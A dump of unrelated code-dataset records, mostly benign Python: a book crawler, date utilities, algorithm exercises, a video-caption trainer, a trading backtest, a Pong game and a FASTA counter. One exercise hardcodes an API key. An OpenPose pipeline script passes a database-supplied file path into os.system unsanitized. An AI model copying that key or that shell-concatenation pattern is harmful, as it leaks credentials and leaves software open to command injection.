author_intro = ''.join(item for item in summarys[1].xpath('p/text()')).replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n author_intro = \"\"\n\n\n #标签\n tag_data=tar_html.xpath(\"//div[@id='db-tags-section']/div/span/a/text()\")\n if tag_data:\n tags=''.join((\" \".join(item for item in tag_data)))\n else:\n tags=\"\"\n\n #评论\n comments=tar_html.xpath(\"//p[@class='comment-content']/span/text()\")\n for i in range(5):\n names = locals()\n try:\n names['comment' + str(i + 1)] = comments[i].replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n names['comment' + str(i + 1)] = \"\"\n\n\n rec=tar_html.xpath(\"//div[@id='db-rec-section']//dt/a/@href\")\n\n book=[id, title, book_url, pic_url, author, press, original, translator, publish_date, page, price,\n binding, ISBN, score, rating_count, summary, author_intro, author_id,tags]\n\n for i in range(5):\n book.append(names['comment' + str(i + 1)])\n\n for item in rec:\n book.append(item[32:-1])\n\n print(str(current_num)+\"/\"+str(total_num)+\": \"+title)\n if(current_num%50==0):\n driver.quit()\n driver=webdriver.PhantomJS(executable_path=\"./webdriver/phantomjs/bin/phantomjs.exe\")\n try:\n writer.writerow(book)\n except Exception as e:\n print(title+\" write filed.\")\n continue\n\n\n\ndef read_urls():\n tags_col_all = pd.read_csv(\"./results/book_urls.csv\")\n total_num=len(tags_col_all['url'].values.tolist())\n if not os.path.exists(\"./results/books.csv\"):\n return tags_col_all['url'].values.tolist()\n else:\n tags_col_exit=pd.read_csv(\"./results/books.csv\")\n current_num=len(tags_col_exit['book_url'].values.tolist())\n print(\"Having downloaded {0}/{1}\".format(current_num,total_num))\n return list(set(tags_col_all['url'].values.tolist())-set(tags_col_exit['book_url'].values.tolist()))\n\n\n\n\ndef main():\n signal.signal(signal.SIGINT, exit)\n signal.signal(signal.SIGTERM, exit)\n urls = read_urls()\n get_books(urls)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"crawler/download_books_selenium.py","file_name":"download_books_selenium.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318381179","text":"#!/usr/bin/env python3\n\n\"\"\"\nDirectory : mistool\nName : date_use\nVersion : 2014.08\nAuthor : Christophe BAL\nMail : projetmbc@gmail.com\n\nThis script contains some functions to ease the use pof the standard package\n``datetime``.\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom mistool.config import date_name\n\n\n# ------------------------- #\n# -- FOR ERRORS TO RAISE -- #\n# ------------------------- #\n\nclass DateUseError(ValueError):\n \"\"\"\nBase class for errors in the ``date_use`` module of the package ``mistool``.\n \"\"\"\n pass\n\n\n# ------------------- #\n# -- SPECIAL DATES -- #\n# ------------------- #\n\nnow = datetime.now\n\n_WEEKDAYS = {\n \"monday\" : 0,\n \"tuesday\" : 1,\n \"wednesday\": 2,\n \"thursday\" : 3,\n \"friday\" : 4,\n \"saturday\" : 5,\n \"sunday\" : 6\n}\n\ndef nextday(\n date,\n name\n):\n \"\"\"\n-----------------\nSmall description\n-----------------\n\nIn some applications, you have a date and you want to find the nearest coming\nday given by its name, for example the next nearest sunday after november the\n30th of the year 2013. 
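read_urls() above resumes a crawl by diffing the full URL list against the book_urls already written to books.csv. The same idea without pandas, since only set membership matters; note the original's list(set - set) also loses ordering, which this version keeps:

def pending_urls(all_urls, done_urls):
    done = set(done_urls)
    # preserve the original crawl order, unlike a raw set difference
    return [u for u in all_urls if u not in done]

print(pending_urls(["a", "b", "c"], ["b"]))  # ['a', 'c']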
You can achieve this using a code like the following\none which will print terminal::``2013-12-01``.\n\npython::\n from datetime import datetime\n\n from mistool import date_use\n\n print(\n date_use.nextday(\n date = datetime.strptime(\"2013-11-30\", \"%Y-%m-%d\"),\n name = \"sunday\",\n ).strftime(\"%Y-%m-%d\")\n )\n\n\ninfo::\n The simple but efficient method used in the code was found in cf::``this\n discussion ; http://stackoverflow.com/a/6558571/1054158``.\n\n\n-------------\nThe arguments\n-------------\n\nThis function uses two variables.\n\n 1) ``date`` is a date defined using the class ``datetime.date`` from the\n standard package ``datetime``.\n\n 2) ``name`` is the english long name of the day wanted.\n \"\"\"\n if name not in _WEEKDAYS:\n raise DateUseError(\"Unknown name << {0} >>.\".format(name))\n\n daysahead = _WEEKDAYS[name] - date.weekday()\n\n if daysahead <= 0:\n daysahead += 7\n\n return date + timedelta(daysahead)\n\n\n# ----------------- #\n# -- TRANSLATING -- #\n# ----------------- #\n\nDEFAULT_LANG = 'en_GB'\nLANGS = date_name.LANGS\n\n_POINTERS = date_name._POINTERS\n_FORMATS_TRANSLATIONS = date_name._FORMATS_TRANSLATIONS\n\ndef translate(\n date,\n format,\n lang = DEFAULT_LANG\n):\n \"\"\"\n-----------------\nSmall description\n-----------------\n\nThe aim of this function is to avoid the use of something like in the following\ncode (the documentation of the standard package ``locale`` avoids to do that kind\nof things).\n\npython::\n import locale\n import datetime\n\n locale.setlocale(locale.LC_ALL, 'fr_FR')\n print (datetime.date(2013, 9, 21).strftime(\"%A %d %B %Y\"))\n\nThis code prints the text terminal::``Samedi 29 septembre 2013`` in a terminal.\nThis can be achieved using the function ``translate`` like in the following code.\n\npython::\n from datetime import date\n\n from mistool import date_use\n\n print(\n date_use.translate(\n date = date(2013, 9, 21),\n format = \"%A %d %B %Y\",\n lang = \"fr_FR\"\n )\n )\n\n\nIf you always want to use the same language, you can do it like this.\n\npython::\n import datetime\n\n from mistool import date_use\n\n date_use.LANG = 'fr_FR'\n\n print(\n date_use.translate(\n date = datetime.date(2013, 9, 21),\n format = \"%A %d %B %Y\"\n )\n )\n\n\ninfo::\n The mechanism used in backstage is very primitive : it never calls the\n standard package ``locale`` !\n\n\n-------------\nThe arguments\n-------------\n\nThis function uses three variables.\n\n 1) ``date`` is a date defined using the class ``datetime.date`` from the\n standard package ``datetime``.\n\n 2) ``format`` is a string that uses the special formatters available with\n the method ``strftime`` of the class ``datetime.date``.\n\n 3) ``lang`` is a language respecting the convention needed for the use of\n the function ``locale.setlocale`` of the standard package ``locale``.\n\n This optional variable used the default value ``DEFAULT_LANG`` which is a\n module constant defined by ``DEFAULT_LANG = \"en_GB\"``.\n\"\"\"\n if lang not in LANGS:\n raise DateUseError(\n 'Illegal value << {0} >> for the argument ``lang``.'.format(lang)\n )\n\n nbday = date.weekday()\n nbmonth = date.month - 1\n\n for oneformat in ['%a', '%A']:\n if oneformat in format:\n dayname = _POINTERS[\n _FORMATS_TRANSLATIONS[oneformat][lang]\n ][nbday]\n\n format = format.replace(oneformat, dayname)\n\n for oneformat in ['%b', '%B']:\n if oneformat in format:\n monthname = _POINTERS[\n _FORMATS_TRANSLATIONS[oneformat][lang]\n ][nbmonth]\n\n format = format.replace(oneformat, monthname)\n\n 
return date.strftime(format)\n","sub_path":"mistool/date_use.py","file_name":"date_use.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282350813","text":"import re\nimport json\nimport utm\n\nfile = open('raw.txt','r').read().splitlines()\n\nitems = []\n\nfor line in file:\n match = re.findall(r\"^(.*?)\\°,(.*?)\\°,([a-zA-Z\\s]+)$\",line)\n if(len(match) == 1):\n vara = (utm.from_latlon(float(match[0][0]), float(match[0][1])))\n x = vara[0] \n y = vara[1] \n items.append({\n 'x':float(x),\n 'y':float(y),\n 'long':match[0][0],\n 'lat':match[0][1],\n 'name':str(match[0][2]),\n })\n\nprint(json.dumps(items))","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429512411","text":"from collections import deque\ndef bfs():\n Q.append((px,py,0))\n visit[px][py]=1\n while Q:\n x,y,z=Q.popleft()\n for i in range(4):\n tx=x+dx[i]\n ty=y+dy[i]\n if tx<0 or tx>=h or ty<0 or ty>=w:\n if z==1:continue\n return visit[x][y]\n if visit[tx][ty] or building[tx][ty]=='#':continue\n visit[tx][ty]=visit[x][y]+1\n Q.append((tx,ty,z))\n return 'IMPOSSIBLE'\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\nfor T in range(int(input())):\n w,h=map(int,input().split())\n building=[list(input()) for _ in range(h)]\n visit=[[0]*w for _ in range(h)]\n Q=deque()\n px=py=0\n for i in range(h):\n for j in range(w):\n if building[i][j]=='*':\n Q.append((i,j,1))\n visit[i][j]=1\n elif building[i][j]=='@':\n px,py=i,j\n building[i][j]='.'\n print(bfs())","sub_path":"BOJ/2020_04_03/BOJ_5427_불.py","file_name":"BOJ_5427_불.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227291195","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n \n # Need to construct the string in such a way that\n # string gets added from left to right, by left\n # Iterative BFS on tree\n \n # Queue algorithm (if root is null, return \"\" before all this)\n # BFS but for trees\n # 1. enqueue the root\n # 2. While queue not empty\n # a. dequeue front\n # b. convertv value to string and append to string to be returned\n # c. If node.left is not null, enqueue to the back\n # d. If node.right is not null, enqueue to the back\n # 3. 
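The nextday() arithmetic in date_use.py above in one worked example: weekday() is 0 for Monday, so from Saturday 2013-11-30 (weekday 5) to Sunday (index 6) the offset is 6 - 5 = 1 day, and non-positive offsets wrap forward by a week:

from datetime import date, timedelta

WEEKDAYS = {"monday": 0, "tuesday": 1, "wednesday": 2, "thursday": 3,
            "friday": 4, "saturday": 5, "sunday": 6}

def nextday(d, name):
    ahead = WEEKDAYS[name] - d.weekday()
    if ahead <= 0:        # target day already passed this week, wrap around
        ahead += 7
    return d + timedelta(ahead)

print(nextday(date(2013, 11, 30), "sunday"))  # 2013-12-01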
Return\n \n if not root:\n return \"\"\n \n from collections import deque\n \n answer = \"\"\n queue = deque([])\n queue.append(root)\n \n while queue:\n node = queue.popleft()\n answer += str(node.val) + ' ' # ' ' is the delimiter\n \n if node.left:\n queue.append(node.left)\n \n if node.right:\n queue.append(node.right)\n\n # we don't want delimiter at the end of the string\n return answer[:-1]\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n \n # Basically run insert into a binary tree\n if not data:\n return None\n \n # split data into a list of strings\n data = data.split(\" \")\n root = TreeNode(int(data[0]))\n \n def insert(node, value):\n \n if not node:\n return TreeNode(value)\n \n if node.val <= value:\n node.right = insert(node.right, value)\n else:\n node.left = insert(node.left, value)\n \n return node\n \n # for each string, run insert\n for i in range(1, len(data)):\n root = insert(root,int(data[i]))\n\n return root\n \n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans\n","sub_path":"Python/Serialize_and_Deserialize_BST.py","file_name":"Serialize_and_Deserialize_BST.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364697508","text":"import tensorflow as tf\nimport numpy as np\n\nfrom read_data import *\nfrom model_tensorflow import *\nfrom model_tensorflow_attn import *\nimport time\nimport os\n\n\nATTN = True\nDICT_BOUND = 3\nEPOCHS = 2000\nlearning_rate=1e-3\nMAX_LENGTH = 15\nres_path = './result/' \n\n\nif __name__ == '__main__':\n\t###=======================================================\n\t### Import data\n\t###=======================================================\n\ttrain_label = get_train_label()\n\tenglish = readLangs(train_label)\n\tenglish = get_spe_dict(english, DICT_BOUND)\n\tprint('total words numbers: ', english.n_words)\n\n\tid2index = id_index(train_label)\n\ttrain_id = get_train_id()\n\ttrain_feature, train_caption, pick_ids = get_train_batch(train_id, train_label, \n\t\tid2index, english, size=5, max_len=15)\n\tprint('='*80)\n\tprint(train_feature.shape)\n\tprint(train_caption.shape)\n\n\tif ATTN:\n\t\tmodel = Videl_Caption_Generator_ATTN(n_encoder_input=4096, n_hidden=256, n_decoder_input=english.n_words, n_embed=500)\n\t\tsaver = tf.train.Saver()\n\t\ttry:\n\t\t\tsaver.restore(model.sess, save_path=res_path+'model')\n\t\t\tprint('Reload succussfully(ATTN)')\n\t\texcept:\n\t\t\tprint('Start training new model(ATTN)')\t\n\telse:\n\t\tmodel = Videl_Caption_Generator(n_encoder_input=4096, n_hidden=256, n_decoder_input=english.n_words, n_embed=500)\n\t\tsaver = tf.train.Saver()\n\t\ttry:\n\t\t\tsaver.restore(model.sess, save_path=res_path+'model')\n\t\t\tprint('Reload succussfully')\n\t\texcept:\n\t\t\tprint('Start training new model')\t\n\n\tif not os.path.exists(res_path):\n\t\tos.mkdir(res_path)\n\n\tstart = time.time()\n\tfor iter in range(EPOCHS):\n\t\tstart_single = time.time()\n\t\ttrain_feature, train_caption, pick_ids = get_train_batch(train_id, train_label, id2index, 
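Why the BST codec above round-trips: BFS emits every parent before its children, and because the tree is a BST, plain value insertion rebuilds exactly the same shape from that order. A self-contained check of the serialize half (TreeNode redeclared so the snippet runs on its own):

from collections import deque

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def serialize(root):
    if not root:
        return ""
    out, queue = [], deque([root])
    while queue:
        node = queue.popleft()
        out.append(str(node.val))
        if node.left:
            queue.append(node.left)
        if node.right:
            queue.append(node.right)
    return " ".join(out)

# hand-built BST:  2
#                 / \
#                1   3
root = TreeNode(2)
root.left = TreeNode(1)
root.right = TreeNode(3)
print(serialize(root))  # "2 1 3": parents strictly before children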
english, size=5, max_len=15)\n\t\tloss, output = model.train(train_feature, train_caption)\n\n\t\tif iter%5 == 0:\n\t\t\tend_single = time.time()\n\t\t\tcost = end_single - start\n\t\t\tcost_m = cost // 60\n\t\t\tcost_s = cost % 60\n\n\t\t\tprint('='*100)\n\t\t\tprint('iter: %d/%d | loss: %.2f | cost: %dmin%ds' % (iter, EPOCHS, loss, cost_m, cost_s))\n\t\t\tprint('example id: ', pick_ids[0])\n\t\t\tprint('predict example:')\n\t\t\tprint(vec2seq(output[0], english))\n\t\t\tprint('ground truth:')\n\t\t\tprint(vec2seq(train_caption[0], english))\n\n\t\t\tsaver.save(model.sess, save_path=res_path+'model')\n\t\t\tprint('Model Save Successfully~')\n\n\n","sub_path":"tensorflow/Seq2Seq/tensorflow-vedio-caption/train_tensorflow.py","file_name":"train_tensorflow.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566635767","text":"'''\nplot-optimize-over-time.py\n\nDetermines how optimal paramters move over\ntime\n\nWritten by Dennis Cahillane\nSeptember 28, 2020\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport argparse\nfrom itertools import product\nfrom prism_strategy import PrismStrategy\nfrom html_service import HTMLService\n\nmpl.rcParams.update({'figure.figsize':(14,9),\n 'text.usetex': False,\n 'font.family': 'serif',\n 'lines.linewidth': 2.5,\n 'font.size': 14,\n 'xtick.labelsize': 'large',\n 'ytick.labelsize': 'large',\n 'legend.fancybox': True,\n 'legend.fontsize': 14,\n 'legend.framealpha': 0.7,\n 'legend.handletextpad': 0.5,\n 'legend.labelspacing': 0.2,\n 'legend.loc': 'best',\n 'savefig.dpi': 80,\n 'pdf.compression': 9})\n\nbitcoin_csv = 'price-history/Bitcoin Data __ 30-Min __ Bitmex (XBTUSD) - ALL.csv'\nraw = pd.read_csv(bitcoin_csv, comment='#', sep=',', index_col=0, parse_dates=True)\n\nsource = 'close'\nresults = pd.DataFrame()\n\ninterval = 5\nclose_slow_length_range = range(20, 96, interval)\nclose_fast_length_range = range(5, 66, interval)\n\nparameter_view = pd.DataFrame()\nparameter_view = parameter_view.reindex(columns = close_slow_length_range)\nparameter_view = parameter_view.reindex(parameter_view.index.tolist() + list(close_fast_length_range))\nyears = range(2018, 2021)\nmonths = range(1, 13)\nfor year in years:\n for month in months:\n end_date = f'{year}-{month}-01'\n subset = raw.loc['2017-01-01':end_date]\n for close_fast_length in close_fast_length_range:\n for close_slow_length in range(max(20, close_fast_length + interval), 96, interval):\n prism_strategy = PrismStrategy(close_fast_length = close_fast_length, close_slow_length = close_slow_length)\n perf, data = prism_strategy.backtest(subset, source)\n ratio = round(perf[1]/perf[0], 2)\n parameter_view.at[close_fast_length, close_slow_length] = ratio\n\n results = results.append(pd.DataFrame(\n {'close_fast_length': close_fast_length,\n 'close_slow_length': close_slow_length,\n 'market': perf['Returns'],\n 'strategy': perf['Strategy'],\n 'outperform': perf['Strategy'] - perf['Returns']},\n index=[0]), ignore_index=True)\n\n fig = plt.figure()\n ax = plt.gca()\n im = ax.matshow(parameter_view)\n cbar = fig.colorbar(im)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xticks(np.arange(len(close_slow_length_range)))\n ax.set_xticklabels(close_slow_length_range)\n ax.set_yticks(np.arange(len(close_fast_length_range)))\n ax.set_yticklabels(close_fast_length_range)\n\n end_date_str = 
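The elapsed-time report in the training loop above splits seconds with // and %; divmod does both in one call, producing the same min/s pair:

import time

start = time.time()
time.sleep(0.1)
cost_m, cost_s = divmod(int(time.time() - start), 60)
print(f"cost: {cost_m}min{cost_s}s")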
subset.last_valid_index().date().strftime(\"%Y-%m-%d\")\n ax.set_title(f\"Performance until {end_date_str}\", fontsize=24)\n ax.set_xlabel('SMA (slow)')\n ax.set_ylabel('SMA (fast)')\n\n #plt.show()\n plt.savefig(f'animation/until-{end_date_str}.png', bbox_inches='tight')\n plt.close()\n","sub_path":"plot-optimize-over-time.py","file_name":"plot-optimize-over-time.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318433773","text":"# -*- coding: UTF-8 -*-\n\"\"\"Refactoring.\n\nThis exercise contains a complete and working example, but it's very poorly written.\n\nYour job is to go through it and make it as good as you can.\n\nThat means making it self-documenting wherever possible, adding comments where\nit isn't. Take repeated code and make it into a function. Also use functions\nto encapsulate concepts. If something is done many times, maybe a map or a loop\nis called for. Etc.\n\nSome functions will have directions as external comments, once you think you\nare on top of it, take these comments out. Others won't have comments and\nyou'll need to figure out for yourself what to do.\n\"\"\"\nimport math\n\n# return a list of countdown messages, much like in the bad function above.\n# It should say something different in the last message.\ndef countdown(message, start, stop, completion_message):\n countdown = []\n for i in range(start,stop-1,-1):\n print(message + \" \" + str(i))\n countdown.append(message + \" \" + str(i))\n print(completion_message)\n countdown.append(completion_message)\n return countdown\n\n# TRIANGLES\n\n# This should be a series of functions that are ultimatly used by\n# triangle_master\n# It should eventually return a dictionary of triangle facts. It should\n# optionally print information as a nicely formatted string. 
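The optimizer script above stores one strategy/market ratio per (fast, slow) SMA pair and renders the grid with matshow, labelling the axes with the parameter ranges. A stripped-down sketch of just that heatmap step, with random data standing in for the backtest ratios:

import numpy as np
import matplotlib.pyplot as plt

fast = range(5, 66, 5)
slow = range(20, 96, 5)
grid = np.random.rand(len(fast), len(slow))  # stand-in for the ratio table

fig, ax = plt.subplots()
im = ax.matshow(grid)
fig.colorbar(im)
ax.set_xticks(np.arange(len(slow)))
ax.set_xticklabels([str(v) for v in slow])
ax.set_yticks(np.arange(len(fast)))
ax.set_yticklabels([str(v) for v in fast])
ax.set_xlabel("SMA (slow)")
ax.set_ylabel("SMA (fast)")
fig.savefig("heatmap.png", bbox_inches="tight")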
Make printing\n# turned off by default but turned on with an optional argument.\n# The stub functions are made for you, and each one is tested, so this should\n# hand hold quite nicely.\ndef calculate_hypotenuse(base, height):\n hyp = math.sqrt(base ** 2 + height ** 2)\n #print(\"Calculalte hyp: base, height = \" + str(base) + \" \" + str(height) + \" \" + str(hyp))\n return hyp\n\n\ndef calculate_area(base, height):\n area = 0.5 * (base * height)\n #print(\"area = \" + str((base * height) / 2))\n return area\n\n\ndef calculate_perimeter(base, height):\n hyp = calculate_hypotenuse(base, height)\n perimeter = base + height + hyp\n return perimeter\n\n\ndef calculate_aspect(base, height):\n #c = calculate_hypotenuse(base, height)\n #s = 0.5 * (base + height + c)\n #aspect = (base * height * c) / ((8) * (s - base) * (s - height) * (s - c))\n if (base == height):\n return \"equal\"\n elif ( base < height):\n return \"tall\"\n else:\n return \"wide\"\n\n\n# Make sure you reuse the functions you've already got\n# Don't reinvent the wheel\ndef get_triangle_facts(base, height, units=\"mm\"):\n return {\n \"area\": calculate_area(base, height),\n \"perimeter\": calculate_perimeter(base, height),\n \"height\": height,\n \"base\": base,\n \"hypotenuse\": calculate_hypotenuse(base, height),\n \"aspect\": calculate_aspect(base, height),\n \"units\": units,\n }\n\n\n# this should return a multi line string that looks a bit like this:\n#\n# 15\n# |\n# | |\\\n# |____>| \\ 17.0\n# | \\\n# | \\\n# ------\n# 8\n# This triangle is 60.0mm²\n# It has a perimeter of 40.0mm\n# This is a tall triangle.\n#\n# but with the values and shape that relate to the specific\n# triangle we care about.\ndef tell_me_about_this_right_triangle(facts_dictionary):\n tall = \"\"\"\n {height}\n |\n | |\\\\\n |____>| \\\\ {hypotenuse}\n | \\\\\n | \\\\\n ------\n {base}\"\"\"\n wide = \"\"\"\n {hypotenuse}\n ↓ ∕ |\n ∕ | <-{height}\n ∕ |\n ∕------------|\n {base}\"\"\"\n equal = \"\"\"\n {height}\n |\n | |⋱\n |____>| ⋱ <-{hypotenuse}\n |____⋱\n {base}\"\"\"\n\n b = facts_dictionary.get(\"base\")\n h = facts_dictionary.get(\"height\")\n text = \"\"\n aspect = \"\"\n if (b == h):\n text = equal\n aspect = \"equal\"\n elif ( b < h):\n text = tall\n aspect = \"tall\"\n else:\n text = wide\n aspect = \"wide\"\n\n pattern = (\n \"This triangle is {area}{units}²\\n\"\n \"It has a perimeter of {perimeter}{units}\\n\"\n \"This is a \" + aspect + \" triangle.\\n\"\n )\n\n facts = text.format(**facts_dictionary) + \"\\n\" + pattern.format(**facts_dictionary)\n return facts\n\n\ndef triangle_master(base, height, return_diagram=False, return_dictionary=False):\n if return_diagram and return_dictionary:\n return {\"diagram\": tell_me_about_this_right_triangle(get_triangle_facts(base, height, units=\"mm\")), \"facts\": get_triangle_facts(base, height, units=\"mm\")}\n elif return_diagram:\n return tell_me_about_this_right_triangle(get_triangle_facts(base, height, units=\"mm\"))\n elif return_dictionary:\n return get_triangle_facts(base, height, units=\"mm\")\n else:\n print(\"You're an odd one, you don't want anything!\")\n\ndef wordy_pyramid(api_key):\n import requests\n \n pyramid_list = []\n for i in range(3, 21, 2):\n word = get_a_word_of_length_n(i)\n pyramid_list.append(word)\n for i in range(20, 3, -2):\n word = get_a_word_of_length_n(i)\n pyramid_list.append(word)\n return pyramid_list\n\n\ndef get_a_word_of_length_n(length):\n import requests\n baseURL = (\n \"https://us-central1-waldenpondpress.cloudfunctions.net/give_me_a_word?\"\n 
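Checking the triangle helpers above against the 8x15 case from the diagram docstring: the hypotenuse is sqrt(8^2 + 15^2) = 17.0, the area 60.0, the perimeter 40.0, and the aspect is "tall" because base < height:

import math

base, height = 8, 15
hyp = math.sqrt(base ** 2 + height ** 2)   # sqrt(64 + 225) = 17.0
area = 0.5 * base * height                 # 60.0
perimeter = base + height + hyp            # 40.0
print(hyp, area, perimeter)
print("tall" if base < height else "wide" if base > height else "equal")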
\"wordlength={length}\" \n # \"http://api.wordnik.com/v4/words.json/randomWords?\"\n # \"api_key=n8o442zwoedg02xlpw8bqb0d9zz2sqz6nl03g4otebnjabpew\"\n # \"&minLength={length}\"\n # \"&maxLength={length}\"\n #\"&limit=1\"\n )\n \n url = baseURL.format(length=length)\n r = requests.get(url)\n if r.status_code is 200:\n return r.text\n else:\n print(\"failed a request\", r.status_code, length)\n\n\ndef list_of_words_with_lengths(list_of_lengths): \n word_list = []\n for i in list_of_lengths:\n word = get_a_word_of_length_n(i)\n word_list.append(word)\n return word_list\n\nif __name__ == \"__main__\":\n #do_bunch_of_bad_things()\n wlist = wordy_pyramid(\"n8o442zwoedg02xlpw8bqb0d9zz2sqz6nl03g4otebnjabpew\")\n for word in wlist:\n print(word)\n\n","sub_path":"week5/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245666267","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os \r\nimport database_connect\r\n\r\ndatabase_rowcount = database_connect.row_count()\r\n\r\nwhile True:\r\n if database_connect.row_count() <= database_rowcount:\r\n continue\r\n\r\n print(\"new data\")\r\n database_rowcount = database_connect.row_count()\r\n video_path, video_id, video_date = database_connect.new_video_id()\r\n video_path = \"/home/data/uploads/\" + video_path\r\n print(video_path)\r\n print(video_date)\r\n print(video_id)\r\n \r\n openpose_output_path = \"/home/json_out/json\" + str(video_id)\r\n print(openpose_output_path)\r\n \r\n os.chdir(\"../../openpose\")\r\n os.system(\"./build/examples/openpose/openpose.bin --video \" + video_path + \" --write_json \" + openpose_output_path + \" --render_pose 0 --display 0 --hand\")\r\n os.chdir(\"../baspose/src\")\r\n os.system(\"python3 test1.py\")\r\n","sub_path":"src/combine3.py","file_name":"combine3.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"13845339","text":"# Followed https://kivy.org/docs/tutorials/pong.html\nfrom random import randint\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.logger import Logger\nfrom kivy.properties import NumericProperty, ReferenceListProperty, Clock, \\\n ObjectProperty\nfrom kivy.uix.widget import Widget\nfrom kivy.vector import Vector\n\nkivy.require('1.10.0')\n\n\nclass PongBall(Widget):\n velocity_x = NumericProperty(0)\n velocity_y = NumericProperty(0)\n velocity = ReferenceListProperty(velocity_x, velocity_y)\n\n def move(self):\n self.pos = Vector(*self.velocity) + self.pos\n\n\nclass PongGame(Widget):\n ball = ObjectProperty()\n player1 = ObjectProperty()\n player2 = ObjectProperty()\n\n def serve_ball(self, speed=4, min_angle=0, max_angle=360):\n self.ball.center = self.center\n new_velocity = Vector(speed, 0).rotate(randint(min_angle, max_angle))\n self.ball.velocity = new_velocity\n\n def update(self, dt):\n self.ball.move()\n\n self.player1.bounce_ball(self.ball)\n self.player2.bounce_ball(self.ball)\n\n if (self.ball.y < 0) or (self.ball.top > self.height):\n self.ball.velocity_y *= -1\n\n if self.ball.x < 0:\n self.player2.score += 1\n self.serve_ball(min_angle=-90, max_angle=90)\n if self.ball.x > self.width:\n self.player1.score += 1\n self.serve_ball(min_angle=90, max_angle=270)\n\n def on_touch_move(self, touch):\n if touch.x < self.width / 3:\n self.player1.center_y = touch.y\n if touch.x > self.width - self.width / 3:\n self.player2.center_y = touch.y\n\n\nclass 
PongPaddle(Widget):\n score = NumericProperty(0)\n\n def bounce_ball(self, ball):\n if self.collide_widget(ball):\n vx, vy = ball.velocity\n offset = (ball.center_y - self.center_y) / (self.height / 2)\n bounced = Vector(-1 * vx, vy)\n vel = bounced * 1.1\n ball.velocity = vel.x, vel.y + offset\n\n\nclass PongApp(App):\n def build(self):\n Logger.info('Pong: Building PongApp')\n game = PongGame()\n game.serve_ball()\n Clock.schedule_interval(game.update, 1.0/60.0)\n return game\n\n\nif __name__ == '__main__':\n Logger.info('Pong: Running PongApp')\n PongApp().run()\n","sub_path":"poc/pong/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589646182","text":"##############\n# Exercise 2.6\n##############\nfrom collections import Counter\nclass AADist:\n \"\"\"\n The class provides a method to read fasta files and to calculate certain statistics on the read sequences.\n \"\"\"\n\n def __init__(self, filepath):\n self.__sequences = {}\n self.read_fasta(filepath)\n\n\n def get_counts(self):\n return len(self.__sequences.keys())\n\n\n def get_average_length(self):\n cnt = 0\n for i,j in self.__sequences.items():\n cnt = cnt+len(j)\n res=cnt/len(self.__sequences.keys())\n return res\n\n\n def read_fasta(self, path):\n def reader(fp):\n head= None\n seq=[]\n for line in fp:\n line=line.rstrip()\n if(line.startswith('>')):\n if(head):\n yield(head, ''.join(seq))\n head=line\n seq=[]\n else:\n seq.append(line)\n if head:\n yield(head,\"\".join(seq))\n\n with open(path) as filee:\n for i,j in reader(filee):\n if j[-1]==\"*\":\n j=j[:-1]\n self.__sequences[i]=j\n\n\n\n def get_abs_frequencies(self):\n # return number of occurences not normalized by length\n resf={}\n for i,j in self.__sequences.items():\n number_counted=Counter(j)\n for k in number_counted:\n if(not k in resf):\n resf[k]=number_counted[k]\n else:\n resf[k]=resf[k]+number_counted[k]\n\n return resf\n\n\n def get_av_frequencies(self):\n # return number of occurences normalized by length\n resf = {}\n for i,j in self.__sequences.items():\n number_counted=Counter(j)\n for k in number_counted:\n if(not k in resf):\n resf[k]=number_counted[k]\n else:\n resf[k]=resf[k]+number_counted[k]\n\n cnt=sum(resf.values())\n resf_dict={}\n for i in resf:\n resf_dict[i]=resf[i]/cnt\n return resf_dict\n","sub_path":"codechecker/repos/1/collected_files/aa_dist/ge73fog.py","file_name":"ge73fog.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 